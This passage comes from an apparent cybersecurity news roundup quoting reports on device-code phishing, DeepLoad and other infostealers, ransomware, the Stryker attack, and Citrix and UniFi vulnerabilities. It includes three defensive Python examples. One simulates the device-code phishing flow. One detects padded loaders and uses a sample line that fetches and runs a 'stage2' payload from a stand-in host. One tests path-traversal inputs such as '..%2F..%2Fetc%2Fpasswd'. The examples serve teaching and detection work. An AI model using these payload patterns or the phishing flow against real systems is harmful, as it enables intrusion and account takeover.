    • “On March 31, Anthropic accidentally exposed the full client-side source code of the new tool via a 59.8 MB JavaScript source map included by accident in the published npm package.”
  • and
    • “Device code phishing attacks that abuse the OAuth 2.0 Device Authorization Grant flow to hijack accounts have surged more than 37 times this year.
    • “In this type of attack, the threat actor sends a device authorization request to a service provider and receives a code, which is sent to the victim under various pretexts.
    • “Next, the victim is tricked into entering the code on the legitimate login page, thus authorizing the attacker’s device to access the account through valid access and refresh tokens.
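To make the device-code abuse concrete, here is an added example (not from the article or from any identity provider) that models the OAuth 2.0 Device Authorization Grant (RFC 8628) in Python: the attacker's machine requests the device code, the victim approves it on the legitimate verification page, and the attacker's poll receives the access and refresh tokens. The authorization server, client names and IP addresses are constructed. Two mitigations are shown, both as illustrative assumptions rather than RFC behaviour: restricting the grant to clients that genuinely need it, and refusing to issue tokens when the approving browser and the polling client sit on different networks.

```python
"""Model of the OAuth 2.0 Device Authorization Grant (RFC 8628) and its phishing abuse.

Added example, not code from the original article or any identity provider. The
authorization server, client names and IP addresses are constructed; the
approver-network check is an illustrative control, not part of RFC 8628.
"""
import secrets


class FakeClock:
    def __init__(self, start=1_700_000_000):
        self.t = start

    def now(self):
        return self.t

    def tick(self, seconds):
        self.t += seconds


class DeviceAuthServer:
    def __init__(self, clock, device_flow_clients=None, bind_approver_network=False):
        self.clock = clock
        self.device_flow_clients = device_flow_clients  # None: any client may use the grant
        self.bind_approver_network = bind_approver_network
        self.pending = {}       # device_code -> request record
        self.by_user_code = {}  # user_code -> device_code

    # Step 1: the client (here, the attacker's machine) asks for a device code.
    def device_authorization(self, client_id, requester_ip, lifetime=900):
        if self.device_flow_clients is not None and client_id not in self.device_flow_clients:
            return {"error": "unauthorized_client"}
        device_code = secrets.token_urlsafe(32)
        user_code = secrets.token_hex(2).upper() + "-" + secrets.token_hex(2).upper()
        self.pending[device_code] = {
            "client_id": client_id, "user_code": user_code, "requester_ip": requester_ip,
            "expires": self.clock.now() + lifetime, "approved_by": None, "approver_ip": None,
        }
        self.by_user_code[user_code] = device_code
        return {"device_code": device_code, "user_code": user_code,
                "verification_uri": "https://login.example/device",
                "expires_in": lifetime, "interval": 5}

    # Step 2: a signed-in user types the code on the legitimate verification page.
    def verify_user_code(self, user_code, user, user_ip):
        device_code = self.by_user_code.get(user_code)
        if device_code is None:
            return "invalid_code"
        rec = self.pending[device_code]
        if self.clock.now() > rec["expires"]:
            return "expired_token"
        rec["approved_by"], rec["approver_ip"] = user, user_ip
        return "approved"

    # Step 3: the client polls the token endpoint with its device_code.
    def token(self, device_code):
        rec = self.pending.get(device_code)
        if rec is None:
            return {"error": "invalid_grant"}
        if self.clock.now() > rec["expires"]:
            return {"error": "expired_token"}
        if rec["approved_by"] is None:
            return {"error": "authorization_pending"}
        if self.bind_approver_network and rec["approver_ip"] != rec["requester_ip"]:
            # Illustrative control: the device that started the flow and the browser
            # that approved it are on different networks, which is the phishing shape.
            return {"error": "access_denied", "reason": "approver_network_mismatch"}
        del self.pending[device_code]
        return {"access_token": secrets.token_urlsafe(24),
                "refresh_token": secrets.token_urlsafe(24),
                "token_type": "Bearer", "sub": rec["approved_by"]}


def run_phishing_scenario(policy="none"):
    """Attacker starts the flow, victim enters the code, attacker polls for tokens."""
    clock = FakeClock()
    server = DeviceAuthServer(
        clock,
        device_flow_clients={"tv-app"} if policy == "deny_client" else None,
        bind_approver_network=(policy == "bind_network"),
    )
    # Attacker at 203.0.113.10 (constructed) requests a code for a client that legitimately uses the grant.
    start = server.device_authorization("mail-client", requester_ip="203.0.113.10")
    if "error" in start:
        return start
    assert server.token(start["device_code"]) == {"error": "authorization_pending"}
    clock.tick(120)
    # Victim, lured by a pretext, enters the code on the real login page from 198.51.100.7 (constructed).
    server.verify_user_code(start["user_code"], user="alice@example.invalid", user_ip="198.51.100.7")
    clock.tick(5)
    return server.token(start["device_code"])


if __name__ == "__main__":
    for policy in ("none", "bind_network", "deny_client"):
        print(policy, run_phishing_scenario(policy))
```

The network check is a heuristic and will misfire for a legitimate set-top box approved from a phone on mobile data; the stronger lever is the client allow-list (a conditional-access rule that disables the grant wherever no TV, CLI or IoT client needs it), paired with alerting on sign-ins that used the device-code grant at all.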
  • Per Cyberscoop,
    • “A new malware-based credential-stealing campaign, which researchers are calling “DeepLoad,” has been infecting enterprise business IT environments.
    • “In a report released Monday, ReliaQuest AI researchers Thassanai McCabe and Andrew Currie say the most relevant feature of this attack is the way it uses artificial intelligence and other engineering “to defeat the controls most organizations rely on, turning one user action into persistent, credential-stealing access.”
    • “DeepLoad is delivered to victims via “QuickFix” social-engineering techniques, such as fake browser prompts or error pages. If the user falls for the scheme, the malware developers — or more likely their AI tools — put a lot of work into building evasion of security technology “at every stage” of the attack chain.
    • “The loader “buries functional code under thousands of meaningless variable assignments,” and the payload runs behind a Windows lock screen process that is “overlooked by security tools” monitoring for threats. ReliaQuest said “the sheer volume” of code padding likely rules out human-only involvement.”
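The padding ReliaQuest describes leaves a measurable trace: declarations that are never read again. The script below is an added example (not code from the article or from ReliaQuest) that scores a JavaScript-like sample on that ratio; both samples, the minimum declaration count and the threshold are constructed assumptions.

```python
"""Score a script for dead-assignment padding of the kind described for DeepLoad.

Added example, not code from the original article or ReliaQuest. The heuristic
counts declared variables that are never referenced again; both samples are
constructed and the threshold is an illustrative assumption.
"""
import re

DECL = re.compile(r"\b(?:var|let|const)\s+([A-Za-z_][A-Za-z0-9_]*)\s*=")


def dead_assignment_stats(source):
    """Return (declared, never_read) for var/let/const declarations in a JS-like script."""
    names = DECL.findall(source)
    never_read = 0
    for name in set(names):
        # Count whole-word occurrences; exactly 1 means only the declaration itself.
        refs = len(re.findall(r"\b" + re.escape(name) + r"\b", source))
        if refs == 1:
            never_read += 1
    return len(names), never_read


def padding_ratio(source):
    declared, never_read = dead_assignment_stats(source)
    return never_read / declared if declared else 0.0


def looks_padded(source, min_declarations=50, threshold=0.9):
    """Flag scripts with many declarations where almost none are ever read."""
    declared, _ = dead_assignment_stats(source)
    return declared >= min_declarations and padding_ratio(source) >= threshold


# Constructed sample: three functional lines buried under 300 meaningless assignments.
PADDED = "\n".join(f"var pad_{i} = {i * 7};" for i in range(300)) + """
var url = "https://example.invalid/stage2";
var payload = fetch(url);
run(payload);
"""

# Constructed benign sample with ordinary variable reuse.
CLEAN = """
const base = "https://example.invalid/api";
let retries = 3;
function get(path) { return fetch(base + path); }
for (let i = 0; i < retries; i++) { get("/status"); }
"""

if __name__ == "__main__":
    for label, src in (("padded", PADDED), ("clean", CLEAN)):
        print(label, dead_assignment_stats(src), round(padding_ratio(src), 3), looks_padded(src))
```

It is one signal, not a verdict: minifiers rename variables but still reference them, so they score low, while a loader that pads with unused assignments scores near 1. Pair it with the behavioural point from the article (a payload hosted in a lock-screen process) rather than relying on either alone.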
  • Info Security discusses,
    • “A new malware-as-a-service (MaaS) platform dubbed Venom Stealer that automates credential theft and continuous data exfiltration has been identified by cybersecurity researchers.
    • “The platform is being sold on cybercrime networks and is designed to go beyond traditional credential harvesting tools by maintaining ongoing access to stolen data even after the initial infection.”

From the ransomware front,

  • Cisco Talos reflects on ransomware trends in 2025.
  • Cyberscoop reports,
    • “The Akira ransomware group has compromised hundreds of victims over the past year with a well-honed attack lifecycle that has whittled down the time from initial access to encryption of data in less than four hours, according to cybersecurity firm Halcyon.”
  • Security Week relates,
    • “Like an inverted pyramid, the range of different attack modes is now built on top of the single point of identity abuse.
    • “Stolen credentials are a major threat. Legitimate credentials illegitimately acquired provide legitimate access to illegitimate actors. Once inside the network, these bad actors have greater ability to move and act in stealth. The continuing rise in ransomware attacks bears testament.
    • “The theft and resale of credentials operates on an industrial scale. Fueled by the rise of increasingly more sophisticated infostealers, stolen credentials are packaged into ‘logs’ and sold to criminals on the black market. Ontinue reports, “Listings tied to LummaC2 alone surged by 72%, with high-privilege cloud console credentials selling for $1,000–$15,000+.”
    • “Ransomware has been one of the primary beneficiaries of stolen credentials. More than 7,000 incidents and 129 active groups were tracked through 2025. At the same time, ransom payments decreased slightly from $892M in 2024 to $820M in 2025. This apparent contradiction is actually logical.
    • “Larger targets, with larger payout potential, will have seen the most aggressive corporate investment (process and technology) mitigating exposure to this attack pattern,” explains Trey Ford, chief strategy and trust officer at Bugcrowd. These larger targets are also more susceptible to government pressure to not pay ransoms, and ransomware income has consequently declined. The ransomware groups have responded with more attacks demanding smaller payments from more but smaller companies.” 

From the cybersecurity defenses front,

  • Dark Reading reports,
    • “After some delay, Apple has patched the vulnerabilities associated with the DarkSword exploit chain for all affected customers, even those who aren’t updated to iOS 26 — a boon for organizations trying to get users updated to a new version all at once, and for those with patch management policies that preclude such updates.”
  • and
    • “Joseph Izzo, chief medical information officer for San Joaquin General Hospital, received ransomware training during a downtime period. He practiced responding and maintaining patient care in the event that the facility is forced to operate offline. But when the hospital where he was working was actually hit with ransomware, he realized very quickly how “different it was under pressure.” 
    • “Izzo shared his story at RSAC 2026 Conference and provided key incident response (IR) recommendations for healthcare organizations, a sector frequently targeted by ransomware gangs due to highly sensitive information. Ransomware doesn’t always cripple hospitals, but partial attacks happen frequently, Izzo explained. Either way, a rapid response is necessary when serving a vulnerable population.
    • “Recommendations ranged from identity protection to being prepared to operate with pen and paper in a digital world. Preparation is what really “makes the difference” when healthcare facilities are trying to get past a ransomware incident, Izzo emphasized.” 
  • Cybersecurity Dive tells us,
    • “Cybersecurity is one of the leading risks influencing corporate executives’ decisions about AI adoption, the consulting firm KPMG said in a quarterly AI pulse survey released on Tuesday.
    • “Three-quarters of senior leaders at large corporations told KPMG that they were worried about the cybersecurity and privacy risk associated with AI tools, according to the report.
    • “The survey also asked questions about governance approaches and agentic AI, offering a window into how businesses around the world are wrestling with new security challenges.”
  • Here is a link to Dark Reading’s CISO Corner.


From the Iranian war front,

  • Industrial Cyber reports,
    • “Following its recent cybersecurity incident, medical technology giant Stryker said it found no indication of ransomware or malware. As the investigation progressed, alongside Palo Alto Networks’ Unit 42 and other experts, the company determined that the threat actor used a malicious file to execute commands, enabling them to conceal activity within its systems. The file was not capable of spreading, either within or outside the environment.
    • “Our internal teams continue to work around the clock with external partners to make meaningful progress on our restoration efforts. We are grateful for the partnership and collaboration with government agencies and industry partners,” Stryker wrote in its latest update. “We believe the incident is contained, and we are prioritizing restoration of systems that directly support customers, ordering and shipping. Our internal teams, in partnership with third-party experts, reacted quickly to not only regain access but to remove the unauthorized party from our environment.”
    • “The update noted that, most importantly, the investigation has not identified any malicious activity directed towards customers, suppliers, vendors, or partners.” * * *
    • “Resecurity warns that the Iran conflict has rapidly evolved into a multi-domain confrontation where kinetic military operations are tightly integrated with cyber, electronic, and information warfare, marking a shift in how modern conflicts unfold. The analysis highlights sustained missile and drone strikes occurring alongside coordinated cyber campaigns driven by state-linked actors and proxy groups targeting critical infrastructure, enterprises, and government systems. This convergence is expected to persist, with cyber operations increasingly used to disrupt services, gather intelligence, and amplify geopolitical impact, even as physical hostilities continue across the region.”
  • MedTech Dive adds,
    • “Stryker has restored most manufacturing sites and critical lines roughly two weeks after the company suffered a cyberattack.
    • “The company is working with its global manufacturing sites as “operations steadily improve towards full capacity,” a spokesperson said in a statement emailed to MedTech Dive. Stryker is making “strong progress” on restoring underlying systems that support production and fulfillment.
    • “Stryker’s electronic ordering system, which was shut down due to the attack, has been restored for customers. The Portage, Michigan-based company is “working as quickly and safely as possible to reconcile orders, manufacture products and deliver to our customers so they can continue to provide seamless patient care,” the spokesperson said.
    • “The spokesperson declined to comment on whether Stryker has a timeline for full restoration of its operations, and whether the financial and material impact on the company is yet known.”
  • Cybersecurity Dive relates,
    • “An Iran-linked ransomware group targeted an unnamed U.S. healthcare provider in the lead-up to the Iran war, according to a report Tuesday [March 24] from Halcyon
    • “Tracked under the name Pay2Key, the group gained access to a compromised administrative account for several days and then encrypted the account. 
    • “Forensics investigators, which included Halcyon and Beazley Security, found no evidence that data was stolen. This marks a departure from the group’s previous attacks. Researchers suggest the attacker may have changed tactics to focus more on destruction rather than pure extortion. 
    • “Also, the threat group appears to have shifted its attention toward the U.S. after historically targeting Israeli systems.” 

From the cybersecurity policy and law enforcement front,

  • Cybersecurity Dive reports,
    • “Members of Congress and their staffs are eagerly awaiting the Trump administration’s plan for implementing its new cybersecurity strategy and want more regular updates on how the government is helping critical infrastructure organizations guard against new Iran-linked hacking threats.
    • “Staffers from the House Homeland Security Committee and the House Oversight Committee discussed those and other cybersecurity issues during a panel at the RSAC 2026 Conference here on Tuesday [March 24].
    • “While the Democratic and Republican staffers sometimes took different approaches to the issues, they agreed on the need for more details about the strategy and about efforts to counter Iran-linked cyberattacks.”
  • and
    • “The program that underpins the entire global vulnerability-fixing ecosystem is in danger of either collapsing or fading into irrelevance without major changes, according to one of the program’s leaders.
    • “I don’t think we can afford to continue at the pace [and] with the tools that we currently have in order to make real progress. We’re just gonna be left in the dust,” Katie Noble, a board member for the Common Vulnerabilities and Exposures (CVE) Program, said during a panel at the RSAC 2026 Conference here on Tuesday [March 24].” * * *
    • “Through a network of affiliated organizations, the CVE Program vets vulnerability reports and assigns each flaw a unique CVE number, which helps researchers, businesses, government agencies and information-sharing groups track the flaws and understand their impact. The program is widely considered a crown jewel of the cybersecurity community. But its fate is uncertain after the nonprofit MITRE Corporation, which runs the program, almost lost crucial federal funding last year.
    • “On top of those logistical woes, the broader CVE ecosystem is also reeling from the dramatic AI-powered increase in the number of vulnerability reports flowing into software vendors and open-source platforms.”
  • Cyberscoop adds,
    • “Four former National Security Agency directors shared varying concerns about a lack of earnest and widespread response to growing threats in cyberspace during a discussion at the RSAC 2026 Conference on Tuesday.
    • “Accelerating threats posed by artificial intelligence, China and cybercriminals at large are testing the country’s resolve and determination to foster meaningful public-private collaboration, the former commanders of U.S. Cyber Command said. 
    • “While the four-star military officials remain confident in the country’s resources and people committed to defending the nation from cyberattacks, they voiced unease about challenges that could upend technological dominance and diminish a collective response to serious intrusions. 
    • “I think we’ve become numb to it,” retired Gen. Paul Nakasone said. “We continue to see these different intrusions, and intrusions have gotten to a size that the scale is just incredible to me.”
  • and
    • “A year-long effort to strengthen cybersecurity and modernize tech at U.S. intelligence agencies has led to policy standards for using AI to bolster cyber defenses, a shared repository of all apps that have undergone a cybersecurity review and more, the Office of the Director of National Intelligence announced Thursday [March 26].
    • “An unclassified summary of cyber and tech modernization work under the first year of DNI Tulsi Gabbard’s stewardship states that the office has expanded the automation of threat hunting across intelligence community networks. (The Cybersecurity and Infrastructure Security Agency conducts threat hunting across federal civilian agencies.)
    • The ODNI also has developed a zero-trust strategy that shifts “to a data-centric security model that protects information regardless of location or network,” according to the summary.
    • “Over the past year, we have taken meaningful steps to begin fulfilling that responsibility through the largest IC-wide technology investment and modernization effort in history,” Gabbard said in a news release. “President Trump’s Intelligence Community is moving faster and more decisively on cybersecurity modernization and investments in IT than ever before, delivering stronger defenses, greater efficiency, and real cost savings for the American people.”   
  • Tech Target shares a boatload of other insights from the RSAC conference.
  • Federal News Network tells us,
    • “The Trump administration is prioritizing ensuring the government leads on adopting artificial intelligence for cyber defense, according to a top Office of Management and Budget official.
    • “The use of “AI-enabled cyber tools” is specifically called out in the new national cybersecurity strategy. The White House’s top cyber official has said the administration will launch a series of pilot programs to harden government networks under the new strategy.
    • White House officials in recent weeks convened a roundtable featuring “representatives from industry as well as agencies who are at the cutting edge of cyber defense, to talk about how we can really operationalize AI for cyber defense,” Nick Polk, branch director for cybersecurity within OMB’s Office of the Chief Information Officer, said during a Thursday webinar hosted by the Digital Government Institute.
    • “This is something where we have really decided that we want to take the mantle and have the government lead in this space,” Polk added.”
  • and
    • “The Cybersecurity and Infrastructure Security Agency, after a year of workforce reductions that has left CISA’s ranks depleted, is planning to recruit more than 300 people in the coming months.
    • “The cyber agency is also loosening restrictions around flexible work schedules for its employees.
    • “Acting CISA Director Nick Andersen announced those plans in a March 23 email to staff. Andersen said Department of Homeland Security headquarters had approved CISA’s “critical hire list,” including 329 “mission critical hires” throughout the agency.
    • “During the ongoing government shutdown, CISA will only be hiring for “excepted” positions, Andersen added. Roughly two-thirds of CISA’s staff is currently furloughed due to the DHS shutdown.
  • Cybersecurity Dive informs us,
    • “The Federal Communications Commission on Monday said it will no longer approve imported routers for consumer use without government review. 
    • “An interagency body convened by the White House determined that consumer-grade routers made outside the U.S. present an unacceptable risk to national security, according to FCC officials. 
    • “The Trump administration’s 2025 National Security Strategy says the U.S. should not be dependent on an outside power for core components considered vital to the nation’s economy or defense.”
  • Cyberscoop points out,
    • “An operation to crack down on the widely used RedLine infostealer has netted the extradition of an Armenian man to the United States, where he made an initial appearance in a Texas court Wednesday.
    • Authorities charged Hambardzum Minasyan with conspiracy to commit access device fraud, conspiracy to violate the Computer Fraud and Abuse Act and conspiracy to commit money laundering for his alleged role with RedLine. Infostealers thieve billions of user credentials such as passwords annually.”
  • Security Week adds,
    • “Russian cybercriminal Ilya Angelov, known online as ‘Milan’ and ‘Okart’, has been sentenced to two years in federal prison for his role in the administration of a botnet used to facilitate ransomware attacks, the DOJ announced on Tuesday [March 24].
    • “According to the DOJ, Angelov was part of a threat group tracked by the FBI as Mario Kart, and by the cybersecurity community as TA-551, Shathak, Gold Cabin, Monster Libra, G0127, and ATK236.
    • “The charges against Angelov stem from activities he engaged in between 2017 and 2021, during which his cybercrime group built a botnet by distributing malware via spam email attachments.” * * *
    • “Angelov’s sentencing comes shortly after the DOJ announced that another Russian national, Aleksei Volkov, has been sentenced to 81 months in prison for his role in ransomware attacks.” 
  • The Wall Street Journal notes,
    • “Global hackers are getting better at drawing lessons from online crime busts to build more resilient operations, posing a dilemma for law-enforcement officials.
    • “The problem, known as tactical exposure, is expected to deepen amid calls by the White House for more aggressive action against cybercrime and a recent wave of takedowns and disruptions of cybercrime networks and platforms.”

From the cybersecurity vulnerabilities and breaches front,

  • Cybersecurity Dive reports,
    • “A sophisticated China-nexus threat actor has embedded digital sleeper cells into the networks of telecom firms in multiple countries, according to a report released Thursday from cybersecurity firm Rapid7.
    • “The adversary, tracked as Red Menshen, has used a stealthy, Linux-based implant called BPFdoor that is designed to function within the operating system kernel.
    • “The goal is to run an espionage campaign against critical industry segments and government agencies, maintaining a long-term presence inside these networks, Rapid7 researchers said. ‘There are similarities to campaigns previously launched by other China-nexus actors, including Volt Typhoon and Salt Typhoon, but the mechanisms have evolved and the strategic objectives of these attacks have a longer tail.”
  • and
    • “The evolving threat landscape has placed identity governance at the center of cybersecurity, according to a pair of reports released this week, meaning that organizations should prioritize identity management as a way to protect sprawling computer networks from under-the-radar intrusions.
    • Cloudflare’s report, released Wednesday, and PwC’s report, released Tuesday, both emphasize the need for companies to do a better job of monitoring user behavior and scanning for suspicious network activity.
    • “The rise of AI only makes identity governance even more important, researchers wrote, as the technology helps hackers improve their impersonation tactics.”
  • and
    • “Security researchers warn that a critical vulnerability in Citrix NetScaler products might lead to a wave of exploitation that could rival the 2023 CitrixBleed crisis. 
    • “Citrix on Monday [March 23] disclosed an insufficient input validation flaw in NetScaler ADC and NetScaler Gateway application-delivery products, tracked as CVE-2026-3055, with a severity score of 9.3. 
    • “Citrix also disclosed a race condition flaw, tracked as CVE-2026-4368, in the same products. That vulnerability has a severity score of 7.7.
    • “The input validation flaw can allow an attacker to leak sensitive information, similar to the original CitrixBleed flaw, which led to a wave of high profile data theft and ransomware attacks. 
    • “NetScalers are critical solutions that have been continuously targeted for initial access into enterprise environments,” Benjamin Harris, founder and CEO of watchTowr, told Cybersecurity Dive.”
  • Cyberscoop relates,
    • “Researchers and threat hunters are scrambling to contain a maximum-severity defect in Ubiquiti’s UniFi Network Application that attackers could exploit to take over user accounts by accessing and manipulating files.
    • “The path-traversal vulnerability — CVE-2026-22557 — affects software used to manage UniFi networking devices, including access points, gateways and switches. The vendor disclosed and released patches for the defect in a security advisory Wednesday [March 25].
    • “As of this morning, we have not observed any public proof-of-concept exploits or confirmed reports of exploitation in the wild,” Matthew Guidry, senior product detection engineer at Censys, told CyberScoop.
    • “However, because this is a path-traversal vulnerability, the technical complexity for an attacker is typically lower than memory-corruption or buffer-overflow bugs,” he added. “Given that the CVSS 10 rating implies low attack complexity, we anticipate that once the specific vulnerable endpoint is identified, exploitation will be trivial to automate.”
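Path traversal is the vulnerability class named above, so here is an added example (not the article's or Ubiquiti's code, and not a reconstruction of the UniFi defect) contrasting the prefix check that looks right but fails with a containment check that holds. The base directory and request strings are constructed; nothing is read from disk.

```python
"""Path-traversal check: the naive prefix test beside a containment check that holds.

Added example, not code from the original article or Ubiquiti; it illustrates the
vulnerability class named above, not the UniFi defect itself. The base directory
and request paths are constructed; nothing here is read from disk.
"""
import os
from pathlib import Path
from urllib.parse import unquote


def naive_prefix_check(base_dir, requested):
    """The common but flawed pattern: join, normalise, then compare string prefixes."""
    joined = os.path.normpath(os.path.join(base_dir, requested))
    return joined.startswith(base_dir)


def is_within(base_dir, requested):
    """Return True only if the decoded request resolves to a path inside base_dir.

    Decode percent-encoding once (as a web server would), join, resolve symlinks
    and '..' segments, then require the result to be relative to the resolved base.
    Path.relative_to() raises for anything outside, which also catches an absolute
    path smuggled in as `requested` (pathlib's '/' discards the left side for those).
    """
    base = Path(base_dir).resolve()
    candidate = (base / unquote(requested)).resolve()
    try:
        candidate.relative_to(base)
    except ValueError:
        return False
    return True


def safe_resolve(base_dir, requested):
    """Resolve a user-supplied name to a path under base_dir or refuse it."""
    if not is_within(base_dir, requested):
        raise PermissionError(f"refusing path outside {base_dir}: {requested!r}")
    return (Path(base_dir).resolve() / unquote(requested)).resolve()


if __name__ == "__main__":
    base = "/srv/app/uploads"  # constructed
    for req in ("avatars/1.png", "../config/app.yaml", "..%2F..%2Fetc%2Fpasswd",
                "/etc/passwd", "../uploads_old/backup.tar"):
        print(f"{req!r:32} naive={naive_prefix_check(base, req)!s:5} strict={is_within(base, req)}")
```

Note the two requests the naive check waves through: a sibling directory that shares the prefix (`uploads_old`) and an encoded `..%2F` that a later layer will decode. `is_within` decodes once; if your stack decodes twice, decode twice before checking or reject any `%` that survives the first pass.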

From the ransomware front,

  • The Bangor Daily News reports,
    • “The Maine mental health agency AMHC was the subject of a ransomware attack this month allegedly perpetrated by a Russia-based cybercrime group. 
    • “Qilin, which analysts have cited as the world’s leading ransomware threat, added the Presque Isle-based healthcare organization to a list of victims on its dark web data leak site Tuesday, according to screenshots and reports posted by more than a dozen websites and groups that track ransomware. 
    • “AMHC is the largest behavioral healthcare provider for a large swath of rural Maine, operating in Aroostook, Hancock and Washington counties. It has more than 350 employees and over 5,500 clients between 27 service locations, according to its website. 
    • “The organization acknowledged the attack in a statement to the Bangor Daily News Wednesday, saying that it “recently experienced a network disruption,” and that it had partnered with “cyber incident specialists” to investigate.”
  • Dark Reading relates,
    • “Ransomware is not only growing, threat actors are also accelerating the pace of their attacks by using offensive tools to exploit valid credentials and hit targets with speed and precision. 
    • “The practice has undergone big changes over the past five years. Initially, attacks focused on encrypting data; now, threat actors threaten to extract it to pressure victims into paying. Double-extortion tactics quickly shifted to triple-extortion threats to expose stolen data. Threat actors also transitioned from extorting companies to contacting victims directly — whatever it takes to rake in the cash.
    • “The latest shift is all about speed. Ransomware actors discovered methods to bypass endpoint detection and response (EDR) tools, and they’re increasingly using artificial intelligence (AI) to steal data more quickly. 
    • “Halcyon’s 2026 Method Survey Report reveals that while 98% of organizations use EDR tools for ransomware defense, only 25% “actually trust it to defend against today’s evolving ransomware threat.” Additionally, 78% of surveyed participants say AI made ransomware attacks more effective. Conversely, only 6% believe the tools have improved their own defenses.”  
  • CSO adds,
    • “In 2025, attacker dwell time rose, voice phishing topped email phishing, and threat actors increasingly targeted backup and identity systems, according to Mandiant’s latest incident response data.
    • “Mandiant’s M-Trends 2026 report, released today at the RSA Conference, shows that attackers are moving faster, operating more collaboratively, and increasingly focusing on the systems organizations rely on to recover from breaches.
    • “The report, based on more than 500,000 hours of incident response engagements in 2025, finds that attackers are compressing key phases of the attack lifecycle, even as median dwell time increased to 14 days, up from 11 days the previous year.
    • “In addition, it reveals a change in tactics. Voice phishing accounted for 11% of initial infection vectors, making it the second most common entry point after exploits, which led at 32%. Email phishing declined to 6%, down from 14% the year before, reflecting a move toward more interactive social engineering. Together, the trends point to a shift in both how quickly attacks unfold and what attackers are trying to achieve once inside.”
  • Tech Radar explains why stolen credentials continue to work even when multi-factor authentication is in place.
  • Cybersecurity Dive tells us,
    • “Businesses need to think carefully about when they publicly blame a threat actor for a cyberattack, lest they invite unwanted consequences, experts said at a panel at the RSAC 2026 Conference here on Tuesday.
    • “The rush to attribute is a risky one,” Megan Stifel, the chief strategy officer at the Institute for Security and Technology, a cybersecurity think tank, said during a panel discussion.
    • “Brett Callow, a ransomware expert and senior adviser at FTI Consulting who advises cyberattack victims, called attribution “extremely risky” because “you are bringing third parties into the discussion, and those third parties may very well respond.”

From the cybersecurity defenses front,

  • Cyberscoop reports,
    • “Google is accelerating its timeline for migrating its products to quantum resistant encryption to 2029, the latest sign that tech leaders are worried that they haven’t been aggressive enough in planning for a post-quantum future.
    • “In a blog posted Wednesday [March 25], vice president of security engineering Heather Adkins and senior staff cryptology engineer Sophie Schmieg said that Google and other tech companies have observed faster than expected advances in several quantum fields.
    • “This new timeline reflects migration needs for the PQC era in light of progress on quantum computing hardware development, quantum error correction, and quantum factoring resource estimates,” Adkins and Schmieg wrote.
    • “Google is replacing outdated encryption across their devices, systems and data with new algorithms vetted by the National Institute for Standards and Technology. Those algorithms, developed over a decade by NIST and independent cryptologists, are designed to protect against future attacks from quantum computers.”
  • Cybersecurity Dive relates,
    • “Businesses hoping AI can automate away their security woes should think again, because the technology isn’t a cure-all and is actually introducing new risks, experts warned at the RSAC 2026 Conference here.
    • “We’re seeing advantages [with AI for defense], but we’re also seeing a lot of hiccups as we figure out how to get there,” Adam Pennington, who oversees MITRE’s ATT&CK framework, said during a panel about how AI is changing the push-and-pull between attackers and defenders.
    • “Security teams are using AI in a lot of the same ways as hackers, Pennington said, especially rapid code-writing. “There does need to be some caution, though, in using it directly in defense,” he said. “False positives have always been a problem in trying to apply machine learning and AI to defense.”
    • “The warnings from Pennington and others on the panel come as businesses rush to purchase AI security services, often with seemingly little regard for their efficacy or tradeoffs.”
  • Dark Reading adds,
    • “Organizations may want to think twice before consulting with AI models on software dependency decisions.
    • “New research from Sonatype found that “frontier” models (defined as the most advanced AI models available at a given moment) often generate faulty or fabricated recommendations for software dependencies, which spells trouble for organizations that lean on AI for upgrade and patching guidance. 
    • “Sonatype’s research team analyzed 36,870 unique dependency upgrade recommendations across Maven Central, npm, PyPI, and NuGet between June and August 2025. In all, the DevSecOps company studied a total of 258,000 recommendations generated by seven AI models from Anthropic, OpenAI, and Google.”
  • Here is a link to Dark Reading’s CISO Corner.

Cybersecurity Saturday

From the Iranian War front,

  • The Wall Street Journal reminds us,
    • “Iran pulled off likely the most significant wartime cyberattack against the U.S. in history, leveraging its hacking powers to cause major disruptions at a global medical-equipment firm that struggled to bring itself back online in recent days.
    • “The attack brought a conflict that until now had been largely confined to the Gulf region to the American homeland and offered a preview of the potential for how Iran may broaden its response to the U.S. and Israeli military campaign.
    • “Stryker, the Michigan-based firm hit in the hack, said it experienced “global disruption” and quickly contained it. The company said it believed the incident had been limited to its internal Microsoft systems. The company added that some hospitals may be experiencing temporary pauses in transmissions of medical data, but that its connected products “are not impacted and are safe to use.” Microsoft hasn’t commented on the hack.”
  • The American Hospital Association News adds,
    • “The Cybersecurity and Infrastructure Security Agency [CISA] March 18 released an alert urging U.S. organizations to harden their endpoint management systems following the March 11 cyberattack against Stryker, a U.S.-based medical technology and supply firm. The attack impacted the company’s Microsoft environment, and Stryker said there was no indication of ransomware or malware. The CISA alert provides various recommendations and resources, as well as best practices for securing Microsoft Intune.”
  • Cybersecurity Dive informs us,
    • “The Department of Justice on Thursday [March 19] said four domains used for Iranian-backed hacking and intimidation of political opponents have been taken down in a court-ordered operation. 
    • “Two of the domains were connected to Handala, the state-linked threat group that authorities confirmed was behind the hack of Stryker, a Michigan-based medical technology giant. 
    • “A partially redacted FBI affidavit did not specifically identify Stryker by name, but the details of the attack match with the circumstances of the same incident.” * * *
    • “The sites were part of a larger effort by Iran’s Ministry of Intelligence and Security (MOIS) to intimidate dissidents, conduct malicious attacks, target Israelis and conduct violent attacks against journalists, according to court records. 
    • “Federal authorities obtained a seizure warrant Thursday, according to the FBI affidavit filed Thursday at U.S. District Court in Maryland.
    • “The FBI seizure is not expected to have a major impact on Handala’s ability to conduct attacks, said the Foundation for the Defense of Democracies (FDD).”  
  • Bleeping Computer offers “a five-step playbook to stop Iranian wiper campaigns before they spread.”

From the cybersecurity policy and law enforcement front,

  • Politico reports,
    • “The White House offered additional immigration enforcement concessions to Democrats Friday evening [March 20] as border czar Tom Homan met a second time with a bipartisan group of senators seeking to end the Homeland Security shutdown, according to lawmakers who attended.
    • “Leaving the private meeting, Republican senators said they hope Democrats respond over the weekend to the Trump administration’s bolstered proposal of immigration enforcement changes meant to address Democratic demands for funding DHS.”
  • The Wall Street Journal adds,
    • “March 27 is a make-or-break day for TSA officers.
    • “If Congress leaves that day for a scheduled two-week recess without reaching a deal to fund the Transportation Security Administration, officers are set to miss more than a month of paychecks.” 
  • Cybersecurity Dive lets us know,
    • “The Trump administration will make sure that new AI technologies are secure by design, a senior U.S. official said on Tuesday. [March 17]
    • “What we are working for in my lane is to ensure that the technical security is not seen as a barrier to that innovation, but is seen as a fundamental piece of the ability to scale it and move it as quickly as possible,” National Cyber Director Sean Cairncross said at an event hosted by the McCrary Institute for Cyber and Critical Infrastructure Security.”
